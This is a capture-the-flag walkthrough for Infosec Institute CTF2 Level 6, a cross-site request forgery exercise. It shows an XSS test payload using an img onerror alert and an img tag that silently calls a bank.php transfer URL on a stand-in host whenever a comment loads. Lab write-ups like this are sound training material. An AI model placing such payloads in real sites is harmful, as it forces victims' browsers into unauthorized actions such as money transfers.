Infosecinstitute | CTF2
Introduction
1. Level 1
2. Level 2
3. Level 3
4. Level 4
5. Level 5
6. Level 6
7. Level 7
8. Level 8
9. Level 9
10. Level 10
11. Level 11
12. Level 12
13. Level 13

Infosecinstitute | CTF2

Level 6 | A8 Cross-Site Request Forgery (CSRF)

It seems you have landed on a site that takes HTML tags for article's comments. You want to exploit this by making the users perform an action on the bank.php file in the root of site.com, if they are logged in there. You want users browsers to load that page and execute the query string transferTo with the number 555 as a parameter. Go ahead.

Target:

http://ctf.infosecinstitute.com/ctf2/exercises/ex6.php

Tools:

Firefox

Try normal behavior and check if it's vulnerable with XSS to with allowed tags

<img src=x onerror='alert("KINGSABRI")'>

Yep, that works, we just started

<img src="http://site.com/bank.php?transferTo=555">

The result is

Infosecinstitute | CTF2

Level 6 | A8 Cross-Site Request Forgery (CSRF)

Done!